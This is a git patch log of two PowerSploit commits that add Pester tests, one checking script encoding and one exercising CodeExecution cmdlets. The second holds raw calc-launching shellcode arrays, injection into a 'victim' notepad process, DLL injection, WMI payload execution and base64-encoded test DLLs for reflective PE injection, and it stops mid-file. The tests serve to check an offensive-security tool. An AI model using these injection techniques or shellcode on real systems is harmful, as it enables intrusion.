From 641eff706e9f34914235441a70333b1daab73ae9 Mon Sep 17 00:00:00 2001
From: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date: Thu, 5 Nov 2015 10:36:17 -0500
Subject: Test: Ensure all scripts are not LE Unicode encoded

---
 Tests/PowerSploit.tests.ps1 | 49 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 Tests/PowerSploit.tests.ps1

(limited to 'Tests')

diff --git a/Tests/PowerSploit.tests.ps1 b/Tests/PowerSploit.tests.ps1
new file mode 100644
index 0000000..527face
--- /dev/null
+++ b/Tests/PowerSploit.tests.ps1
@@ -0,0 +1,49 @@
+Set-StrictMode -Version Latest
+
+$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
+$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
+
+filter Assert-NotLittleEndianUnicode {
+    [CmdletBinding()]
+    param (
+        [Parameter(Mandatory = $True,
+                   ValueFromPipelineByPropertyName = $True,
+                   ValueFromPipeline = $True)]
+        [Alias('FullName')]
+        [String[]]
+        $FilePath
+    )
+
+    $LittleEndianMarker = 48111 # 0xBBEF
+
+    Write-Verbose "Current file: $FilePath"
+    Write-Debug "Current file: $FilePath"
+
+    if ([System.IO.Directory]::Exists($FilePath)) {
+        Write-Debug "File is a directory."
+        return
+    }
+
+    if (-not [System.IO.File]::Exists($FilePath)) {
+        Write-Debug "File does not exist."
+        return
+    }
+
+    $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath
+
+    if ($FileBytes.Length -le 2) {
+        Write-Debug "File must be at least 2 bytes in length."
+        return
+    }
+
+    if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) {
+        Write-Debug "File contains little endian unicode marker."
+        throw "$_ is little-endian unicode encoded."
+    }
+}
+
+Describe 'ASCII encoding of all scripts' {
+	It 'should not contain little-endian unicode encoded scripts or modules' {
+		{ Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
+	}
+}
\ No newline at end of file
-- 
cgit v1.2.3


From a0ab599810f8f05a9bf24850fb9104516b71abb7 Mon Sep 17 00:00:00 2001
From: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date: Mon, 9 Nov 2015 10:52:23 -0800
Subject: Excluding the Tests folder from being loaded as a module

---
 PowerSploit.psm1              |   2 +-
 PowerSploit.pssproj           |   1 -
 Tests/CodeExecution.tests.ps1 | 362 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 363 insertions(+), 2 deletions(-)
 create mode 100644 Tests/CodeExecution.tests.ps1

(limited to 'Tests')

diff --git a/PowerSploit.psm1 b/PowerSploit.psm1
index 550b8be..9bc0240 100644
--- a/PowerSploit.psm1
+++ b/PowerSploit.psm1
@@ -1 +1 @@
-Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName -DisableNameChecking }
+Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and ($_.Name -ne 'Tests') } | % { Import-Module $_.FullName -DisableNameChecking }
diff --git a/PowerSploit.pssproj b/PowerSploit.pssproj
index bd96099..ea5854c 100644
--- a/PowerSploit.pssproj
+++ b/PowerSploit.pssproj
@@ -78,7 +78,6 @@
     <Compile Include="CodeExecution\Invoke-ReflectivePEInjection_Resources\Shellcode\x86\ExitThread.asm" />
     <Compile Include="CodeExecution\Invoke-ReflectivePEInjection_Resources\Shellcode\x86\GetProcAddress.asm" />
     <Compile Include="CodeExecution\Invoke-Shellcode.ps1" />
-    <Compile Include="CodeExecution\Invoke-ShellcodeMSIL.ps1" />
     <Compile Include="CodeExecution\Invoke-WmiCommand.ps1" />
     <Compile Include="CodeExecution\Usage.md" />
     <Compile Include="Exfiltration\Exfiltration.psd1" />
diff --git a/Tests/CodeExecution.tests.ps1 b/Tests/CodeExecution.tests.ps1
new file mode 100644
index 0000000..b8e415e
--- /dev/null
+++ b/Tests/CodeExecution.tests.ps1
@@ -0,0 +1,362 @@
+Set-StrictMode -Version Latest
+
+$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
+$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
+$ModuleManifest = "$ModuleRoot\CodeExecution\CodeExecution.psd1"
+
+Remove-Module [C]odeExecution
+Import-Module $ModuleManifest -Force -ErrorAction Stop
+
+Describe 'Invoke-Shellcode' {
+	# 32-bit calc popping shellcode
+	[Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
+								0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
+								0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
+								0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
+								0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
+								0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
+								0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
+								0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
+								0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
+								0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
+								0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
+								0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
+								0x61,0x6c,0x63,0x00)
+
+	# 64-bit calc popping shellcode
+	[Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
+								0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
+								0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
+								0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
+								0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
+								0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
+								0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
+								0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
+								0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
+								0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
+								0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
+								0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
+								0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
+								0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
+								0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
+								0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
+								0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)
+
+	$PowerShell32bit = $False
+	$Shellcode = $Shellcode64
+
+	if ([IntPtr]::Size -eq 4) {
+		$PowerShell32bit = $True
+		$Shellcode = $Shellcode32
+	}
+
+	$64BitOS = $False
+	if ($Env:ProgramW6432) { $64BitOS = $True }
+
+	# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe
+	if ($PowerShell32bit -and $64BitOS) {
+		# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad
+		$NotepadPath = "$($Env:SystemRoot)\SysWow64\notepad.exe"
+	} else {
+		$NotepadPath = "$($Env:SystemRoot)\System32\notepad.exe"
+	}
+
+	BeforeEach {
+		# Kill all running instances of calc.exe or Calculator.exe (i.e. "modern" calc)
+		Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' } | Stop-Process -Force
+	}
+
+	It 'should pop calc without arguments' {
+		Invoke-Shellcode -Force
+
+		Start-Sleep -Seconds 2
+	}
+
+	It 'should pop calc in host process with -Shellcode arg' {
+		Invoke-Shellcode -Shellcode $Shellcode -Force
+
+		Start-Sleep -Seconds 2
+	}
+
+	It 'should pop calc in victim notepad.exe process without -Shellcode arg' {
+		$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
+
+		if ($NotepadProc.ReturnValue -ne 0) {
+			throw 'Could not start victim process: notepad.exe'
+		} 
+
+		$VictimPID = $NotepadProc.ProcessId
+
+		Invoke-Shellcode -ProcessId $VictimPID -Force
+
+		Start-Sleep -Seconds 2
+
+		Stop-Process -Id $VictimPID
+	}
+
+	It 'should pop calc in victim notepad.exe process with -Shellcode arg' {
+		$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
+
+		if ($NotepadProc.ReturnValue -ne 0) {
+			throw 'Could not start victim process: notepad.exe'
+		}
+
+		$VictimPID = $NotepadProc.ProcessId
+
+		Invoke-Shellcode -ProcessId $VictimPID -Shellcode $Shellcode -Force
+
+		Start-Sleep -Seconds 2
+
+		Stop-Process -Id $VictimPID
+	}
+
+	AfterEach {
+		# Validate that a calc process was launched by the shellcode
+
+		$CalcProcs = Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' }
+		$CalcCount = $CalcProcs | Measure-Object
+
+		if ($CalcCount.Count -gt 0) {
+			$CalcProcs | Stop-Process -Force
+		}
+
+		$CalcCount.Count | Should BeGreaterThan 0
+	}
+}
+
+Describe 'Invoke-DllInjection' {
+	$Accessibilitycpl = 'accessibilitycpl.dll'
+	$AccessibilitycplPath = "$($Env:SystemRoot)\System32\$Accessibilitycpl"
+
+	It 'should inject a known system DLL' {
+		if (-not (Test-Path $AccessibilitycplPath)) {
+			throw "$AccessibilitycplPath does not exist on disk."
+		}
+		
+		$LoadedModule = Invoke-DllInjection -ProcessID $PID -Dll $AccessibilitycplPath
+		$LoadedModule | Should Not BeNullOrEmpty
+
+		$LoadedModule -is [System.Diagnostics.ProcessModule] | Should Be $True
+		$LoadedModule.ModuleName | Should Be $Accessibilitycpl
+	}
+
+	It 'should not inject a non-existent DLL' {
+		$NonExistentDllPath = 'C:\foo.dll'
+
+		Test-Path $NonExistentDllPath | Should Be $False
+
+		{ Invoke-DllInjection -ProcessID $PID -Dll $NonExistentDllPath } | Should Throw
+	}
+
+	It 'should not inject to a non-existent process' {
+		{ Invoke-DllInjection -ProcessID 0 -Dll $AccessibilitycplPath } | Should Throw
+	}
+}
+
+Describe 'Invoke-WmiCommand' {
+	$RegistryHive = 'HKEY_CURRENT_USER'
+	$KeyPath = 'SOFTWARE\Microsoft\Cryptography\RNG'
+	$RegistryKeyPath = "HKCU:\$KeyPath"
+	$RegistryPayloadValueName = 'Seed'
+	$RegistryResultValueName = 'Value'
+	$ComputerName = 'localhost'
+	$SamplePayload = { 1+1 }
+	$SamplePayloadResult = & $SamplePayload
+	$SamplePayloadResultType = $SamplePayloadResult.GetType()
+
+	Context 'Successful code execution' {
+		BeforeEach {
+			# Ensure registry keys and values are cleaned up prior to execution
+			Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction SilentlyContinue
+			Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction SilentlyContinue
+			Remove-Item -Path $RegistryKeyPath -ErrorAction SilentlyContinue
+		}
+
+		AfterEach {
+			{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction Stop } | Should Throw
+			{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction Stop } | Should Throw
+			{ Remove-Item -Path $RegistryKeyPath -ErrorAction Stop } | Should Throw
+		}
+
+		It 'should execute a sample payload locally and clean up properly' {
+			$Result = Invoke-WmiCommand -Payload $SamplePayload
+
+			$Result | Should Not BeNullOrEmpty
+			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
+			$Result.PayloadOutput | Should Be $SamplePayloadResult
+			$Result.PSComputerName | Should Be $ComputerName
+		}
+
+		It 'should execute a sample payload "remotely" (localhost) and clean up properly' {
+			$Result = Invoke-WmiCommand -Payload $SamplePayload -ComputerName $ComputerName
+
+			$Result | Should Not BeNullOrEmpty
+			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
+			$Result.PayloadOutput | Should Be $SamplePayloadResult
+			$Result.PSComputerName | Should Be $ComputerName
+		}
+
+		It 'should execute a sample payload with explicit arguments locally and clean up properly' {
+			$Result = Invoke-WmiCommand -Payload $SamplePayload -RegistryHive $RegistryHive -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName
+		
+			$Result | Should Not BeNullOrEmpty
+			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
+			$Result.PayloadOutput | Should Be $SamplePayloadResult
+			$Result.PSComputerName | Should Be $ComputerName
+		}
+	}
+
+	Context 'Invalid arguments' {
+		It 'should not process invalid registry hives' {
+			{ Invoke-WmiCommand -Payload $SamplePayload -RegistryHive 'HKEY_FOO' -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName } | Should Throw
+		}
+	}
+}
+
+Describe 'Invoke-ReflectivePEInjection' {
+	# A bare bones test harness DLL that simply returns L"Hello, world!" upon having WStringFunc called
+	# See https://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
+	$Encoded64BitWStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAACCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+	$Encoded32BitWStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+
+	# A bare bones test harness DLL that simply returns "Hello, world!" upon having StringFunc called
